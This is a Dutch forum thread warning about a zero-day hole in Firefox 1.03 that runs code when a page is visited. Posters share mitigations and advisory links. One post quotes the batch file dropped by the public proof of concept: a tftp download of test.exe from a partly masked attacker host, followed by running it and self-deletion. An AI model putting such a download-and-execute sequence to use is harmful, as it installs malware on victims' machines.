Beveiligingslek in Firefox 1.03

[nteusink]

Er is een ernstige fout ontdekt in Firefox versie 1.03 (de huidige versie) en ouder. De fout maakt het mogelijk dat bij het bezoeken van een website code (zoals spyware) wordt uitgevoerd op je systeem, zonder dat je daarvoor iets hoeft te doen.
Helaas heeft de vermoedelijke ontdekker van het lek direct code vrijgegeven om het lek te misbruiken. Dit heeft hij gedaan op een openbare mailinglist. De enige oplossing die op dit moment bekend is, is het uitschakelen van JavaScript (wat het browsen natuurlijk een stuk minder aangenaam maakt).

Meer info: http://www.securityfocus.com/bid/13544
De proof-of-concept code onder het tabblad exploit zou ik niet uitvoeren.

Morgenochtend zal er wel meer bekend zijn.

 

[nteusink]

Zelf nog even wat geprobeerd: als ik het volgende uitvoer lijkt de proof of concept code in ieder geval niet meer te werken. Of dit het probleem daadwerkelijk oplost kan ik niet garanderen.

Ga naar Tools > Options... > Web Features

vink daar uit: "Allow web sites to install software"

(Ja, ik heb alleen een Engelstalige firefox)

 

[Eagle Creek]

Jaha.. De spyware voor FF gaat er echt aan zitten komen..

Als je wat meer hebt zet ik het op de FP..

Trouwens; aan wat voor programmatuur moet ik dan denken?

 

[nteusink]

Heb verder vrij weinig info. Het commentaar bij de exploit-notificatie die ik kreeg:

FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched).
This code will download/execute a malware without user interaction.

De proof of concept maakt een batch bestand aan op de C: schrijf en voert het daarna uit (zie bijgevoegd screenshot):

tftp -i ******.zapto.org get test.exe c:\test.exe
cls
start c:\test.exe
del %0
cls

hij probeert dus test.exe te downloaden om het daarna uit te voeren. dat kan dus bijvoorbeed een trojan zijn maar de mogelijkheden zijn eigenlijk eindeloos.

De machine waarvan hij test.exe wil downloaden ligt op dit moment trouwens eruit (ip adres is op 100.100.100.100 gezet)

 

[humpe]

Misschien staat hier nog wat tussen.

http://www.breekpunt.nl/result.asp?Search=firefox&tabel=0

 

[buffy]

Geplaatst door humpe
Misschien staat hier nog wat tussen.

http://www.breekpunt.nl/result.asp?Search=firefox&tabel=0

Ja, daar staat ongetwijfeld wel wat tussen.

Maar staat er ook iets tussen dat van belang is voor deze thread, Humpe?

 

[humpe]

Geen idee, ik heb zelf geen ervaring met firefox, ik heb een site opgegeven waar veel over te lezen stond, anders jammer dan...

 

[humpe]

Anders zou hij eens moeten kijken onder google.
Ik wens de gebruiker veel succes.

 

[DENNIS90]

En hier de betekenis v.h. dos commando TFTP:

Bestanden van en naar een externe computer kopiëren waar de
service TFTP wordt uitgevoerd.

TFTP [-i] host [GET | PUT] bron [bestemming]

  -i              Specificeert binaire bestandsoverdrachtmodus
                  (ook octet geheten). In binaire modus wordt
                  het bestand letterlijk byte voor byte geko-
                  pieerd. Gebruik deze modus voor het
                  kopiëren van binaire bestanden.
  host            Specificeert de lokale of externe host.
  GET             Kopieert de bestemming op de externe host naar
                  de bron op de lokale host.
  PUT             Kopieert de bron op de lokale host naar
                  de bestemming op de externe host.
  bron            Specificeert het te kopiëren bestand.
  bestemming      Specificeert waarheen het bestand moet worden
                  gekopieerd.

Dennis.

 

[nteusink]

Hij staat er bij de waarschuwingsdienst:

http://www.waarschuwingsdienst.nl/render.html?it=1188

Nog geen sms gehad trouwens

-edit: SMS binnen

 

[Eagle Creek]

I've got ShortMessageService!

 

[humpe]

Misschien kan je hier wat mee.



http://www.breekpunt.nl/nieuwsbericht.asp?id=10405